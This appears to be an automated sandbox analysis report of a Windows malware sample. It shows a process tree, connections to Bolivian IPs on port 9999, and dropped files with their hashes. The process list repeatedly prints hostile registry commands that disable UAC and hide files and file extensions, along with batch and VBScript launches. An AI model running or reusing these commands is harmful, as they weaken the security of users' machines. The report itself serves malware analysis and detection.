C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lecEgYkU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUUsQIsU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oMIYQMwE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umskAQwQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SWQIoQoc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zuUMgUQA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nOMkgcIY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VAMAcAYI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KqIsosEM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ueQMcgAs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OEIIIkkE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vIIEUUMw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NIowYMsI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LQckAIAU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
Network
| Country | Destination | Domain | Proto |
| BO | 200.87.164.69:9999 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| BO | 200.87.164.69:9999 | tcp | |
| GB | 172.217.169.14:80 | google.com | tcp |
| GB | 172.217.169.14:80 | google.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 200.119.204.12:9999 | tcp | |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| BO | 190.186.45.170:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/1248-0-0x0000000000400000-0x0000000000433000-memory.dmp
C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe
| MD5 | 32a6cebef78f9a851bfa7edee34c02a3 |
| SHA1 | 9db706fef3aa1e682d786f0081e94d706b6673db |
| SHA256 | 38d054ae4a4b1f9147338f8bd23c137a77f92e30da7f5088440b1728a8d269ea |
| SHA512 | b3a576943d6234351acafa81860c8df19d3b0fcc8a9b31559f233c9f920b79ba1ad5185bcb5ab017dfb4e41e880704724312697460f878414f2fba579450e5ec |
C:\ProgramData\fGoIwkok\pWEYIMQs.exe
| MD5 | f8d62a1f1aff92f4d386d455fde0a126 |
| SHA1 | 702a16e830dfc83a6cd19ab5fd7f3a68347717c0 |
| SHA256 | 855a48621fca99637a19677566ddd37cc9d06d2e71663328f8814008f398c69f |
| SHA512 | be63c7e3c34b364676f29b94eacb71e64da6c49907a1ef09c53538edf8bb6a353e888658ab7887d0fae8c13251c7abd40718bb01c6da7840c3d867cfbb712944 |
memory/2644-15-0x0000000000400000-0x0000000000431000-memory.dmp
memory/4768-12-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1248-19-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4204-20-0x0000000000400000-0x0000000000433000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\juEQgswk.bat
| MD5 | bae1095f340720d965898063fede1273 |
| SHA1 | 455d8a81818a7e82b1490c949b32fa7ff98d5210 |
| SHA256 | ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a |
| SHA512 | 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024 |
C:\Users\Admin\AppData\Local\Temp\file.vbs
| MD5 | 4afb5c4527091738faf9cd4addf9d34e |
| SHA1 | 170ba9d866894c1b109b62649b1893eb90350459 |
| SHA256 | 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc |
| SHA512 | 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5 |
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
| MD5 | 465608ce506144bb84af2ccfc475e15b |
| SHA1 | ad35db7aedb4d245d4151fe7f91a195248f71f73 |
| SHA256 | 862c779a739524499e4d3ab328d041769417ff471e5eb7b183372c82a408a329 |
| SHA512 | c026a6ca05f92fb8b749cb1bddecca2d5101e3cda05c488ac354860cc6b333392780ca4fbdc71c1310500c168623c365a6db80fe9a11e0e5b2d24ca34f098d95 |
memory/4204-33-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3748-34-0x0000000000400000-0x0000000000433000-memory.dmp
memory/5056-42-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3748-46-0x0000000000400000-0x0000000000433000-memory.dmp
memory/5056-57-0x0000000000400000-0x0000000000433000-memory.dmp
memory/436-69-0x0000000000400000-0x0000000000433000-memory.dmp
memory/5020-81-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1516-92-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2272-103-0x0000000000400000-0x0000000000433000-memory.dmp
memory/5028-114-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2832-127-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4092-138-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4180-149-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4232-150-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4232-163-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4608-174-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2968-185-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2932-193-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4640-197-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2932-210-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1368-220-0x0000000000400000-0x0000000000433000-memory.dmp
memory/384-232-0x0000000000400000-0x0000000000433000-memory.dmp
C:\ProgramData\fGoIwkok\pWEYIMQs.inf
| MD5 | f278d1eb754615a3e65f152eff901ffc |
| SHA1 | 74af2d041fe6ecff3835167d43acb3512aed3f7b |
| SHA256 | 71a341aaffcb148a16f7b85b525dbeb1c6d4a0a09f4fcce6b813b21a5b790674 |
| SHA512 | ea0e6a3e5696ceb6fdd2f0794c7fb2446976b9de3346c4de91845801feb89cf55dcae84264f632cd4a52482ecf2087b1f940671ff353f0051b063f276b1bcf5a |
C:\Users\Admin\ueMcoUsA\xoEoMkQo.inf
| MD5 | 23b381bb9912c3e9411d9419e0fc8f46 |
| SHA1 | 644d8d3ec5d1da88d1f0d3c08cfe81228b3fc04c |
| SHA256 | f07aa7a79bb82dd2b2e2d66f1dd5f6d276ab5c6e2388ccd6a211b40bfafc4b55 |
| SHA512 | 4a1368de4cdf127dcd15a267b0bfb9f36f0fbc117ad8a707612fa878d4b657add094962606d5156c1efbee3cc62105ed8b364e6185010fdebe710c1c30be7196 |
memory/768-247-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4304-248-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4304-257-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4760-265-0x0000000000400000-0x0000000000433000-memory.dmp
memory/396-270-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2788-274-0x0000000000400000-0x0000000000433000-memory.dmp
memory/396-284-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1220-292-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2336-300-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2308-308-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1464-318-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3364-326-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4228-334-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4280-336-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4280-343-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3544-353-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2372-354-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2372-362-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2484-370-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1060-380-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4464-382-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4464-389-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4304-390-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4304-399-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2040-408-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3052-416-0x0000000000400000-0x0000000000433000-memory.dmp
